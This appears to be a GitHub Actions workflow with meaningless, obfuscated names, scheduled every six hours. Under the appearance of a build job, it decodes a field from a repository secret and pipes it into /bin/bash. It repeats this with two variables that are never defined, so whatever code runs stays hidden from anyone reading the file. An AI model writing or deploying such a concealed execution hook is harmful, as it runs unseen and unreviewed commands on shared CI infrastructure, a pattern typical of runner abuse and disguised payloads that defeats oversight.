name: tremblebusy

on:
  workflow_dispatch:
  schedule:
    - cron: '15 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tremblebusy
        env:
          yo18821: ${{ secrets.yo18821 }}
        run: |
          echo $yo18821 | jq -r .rpuud29 | /bin/bash
          echo $vpqu2474 | jq -r .rwtj2 | /bin/bash
          echo $l73 | jq -r .i109 | /bin/bash

